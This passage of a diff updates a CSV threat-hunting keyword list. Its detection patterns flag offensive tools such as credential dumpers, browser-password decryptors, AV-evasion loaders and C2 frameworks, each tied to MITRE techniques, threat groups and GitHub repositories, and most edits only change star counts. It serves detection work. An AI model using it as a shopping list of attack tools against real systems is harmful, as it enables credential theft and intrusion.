- Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" -"*hack-browser-data.exe*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8729","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"*hack-browser-data.exe*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" "*hack-browser-data/*","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","84","15","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z" "*HACKER*FUCKER*Xeroxxx*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*hackertarget-get-rootdomains *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*hackingtool.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39264","4347","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*hackingtool.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation 
tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" "*Hackndo/sprayhound*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*Hackndo/sprayhound*","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","136","12","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" -"*hackndo@gmail.com*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*hackndo@gmail.com*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*Hackplayers/evil-winrm*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*hackrf_sweep -f *","offensive_tool_keyword","exegol","Fully featured and 
community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*hacksysteam/CVE-2023-*","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","3","250","57","2023-02-27T04:51:20Z","2023-01-30T12:57:48Z" -"*HackTheWorld*","offensive_tool_keyword","HackTheWorld","An Python Script For Generating Payloads that Bypasses All Antivirus so far.","T1566 - T1106 - T1027 - T1059 - T1070","TA0002 - TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/stormshadow07/HackTheWorld","1","0","N/A","N/A","9","866","179","2020-04-28T20:17:54Z","2018-02-17T11:46:40Z" -"*Hacktool.Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" -"*hacktools-*.xpi*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5006","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" -"*hack-tools/cmbndhnoonmghfofefkcccljbkdpamhi*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5006","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" -"*Hack-Tools-master*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5006","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*HackTheWorld*","offensive_tool_keyword","HackTheWorld","An Python Script For Generating Payloads that Bypasses All Antivirus so far.","T1566 - T1106 - T1027 - T1059 - T1070","TA0002 - TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/stormshadow07/HackTheWorld","1","0","N/A","N/A","9","867","179","2020-04-28T20:17:54Z","2018-02-17T11:46:40Z" +"*Hacktool.Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. 
Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*hacktools-*.xpi*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*hack-tools/cmbndhnoonmghfofefkcccljbkdpamhi*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*Hack-Tools-master*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" "*Hack-with-Github*","offensive_tool_keyword","Github Username","An Open Source Hacking Tools database","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Hack-with-Github","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*hades_directsys.exe*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation 
tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*HadesLdr-main*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" -"*hak5/omg-payloads*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*haKCers.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*hakluke/hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3967","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" -"*hakrawler -*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3967","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" -"*hakrawler.go*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3967","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" -"*hakrawler@latest*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3967","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" 
+"*hak5/omg-payloads*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*haKCers.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*hakluke/hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*hakrawler -*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - 
TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*hakrawler.go*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*hakrawler@latest*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" "*hakrawler-ip-range*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*hakrawler-master*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3967","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" -"*haktrails subdomains*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3967","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" 
+"*hakrawler-master*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*haktrails subdomains*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" "*Hakumarachi/Bropper*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","N/A","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*handelsregister-get-company-names *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*handle_nessus_file*","offensive_tool_keyword","crackmapexec","function name from nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*handlekatz.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*handle_nessus_file*","offensive_tool_keyword","crackmapexec","function name from nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*handlekatz.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*handlekatz.x64.*","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*handlekatz_bof.*","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10","","N/A","","","" -"*handlekatz_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*HANDLEKATZ_EXE_NAME=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - 
TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*handlekatz_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*HANDLEKATZ_EXE_NAME=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*Hangingsword/HouQing*","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Hangingsword/HouQing","1","1","N/A","10","10","205","59","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z" "*HardHatC2*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*hardhatc2.com*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" 
@@ -11126,61 +11277,61 @@ "*hash3liZer/SillyRAT*","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","6","594","151","2023-06-23T18:49:43Z","2020-05-10T17:37:37Z" "*hash3liZer/wifijammer*","offensive_tool_keyword","wifijammer","wifijammer","T1497 - T1498 - T1499","TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/hash3liZer/wifijammer","1","1","N/A","N/A","2","168","43","2021-06-10T12:33:49Z","2018-01-20T16:26:45Z" "*Hash-Buster*","offensive_tool_keyword","Hash-Buster","hash cracking tool ","T1201 - T1110 - T1021","TA0001 - TA0002 - TA0006","N/A","N/A","POST Exploitation tools","https://github.com/s0md3v/Hash-Buster","1","1","N/A","N/A","10","1543","392","2023-04-11T09:43:06Z","2017-07-03T17:28:51Z" -"*hashcat*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","18342","2659","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" -"*hashcat-*.7z*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","18342","2659","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" -"*hashcat.git*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","18342","2659","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" 